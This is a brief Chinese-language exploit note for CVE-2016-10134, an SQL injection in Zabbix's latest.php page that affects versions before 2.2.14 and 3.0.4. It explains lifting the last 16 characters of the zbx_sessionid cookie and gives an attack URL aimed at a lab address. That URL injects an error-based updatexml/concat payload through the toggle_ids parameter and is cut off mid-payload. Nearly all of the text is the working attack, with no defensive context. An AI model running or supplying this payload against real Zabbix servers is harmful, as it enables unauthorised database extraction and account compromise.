zabbix latest.php SQL注入漏洞CVE-2016-10134
Zabbix2.2.14之前的版本和3.0.4之前的3.0版本latest.php页面提取cookie中的zbx_sessionid的后16位246c58ba963457efhttp://192.168.49.2:8080/latest.php?output.php=ajax&sid=246c58ba963457ef&favobj=toggle&toggle_open_state=1&toggle_ids=updatexml(0,concat(0xa,da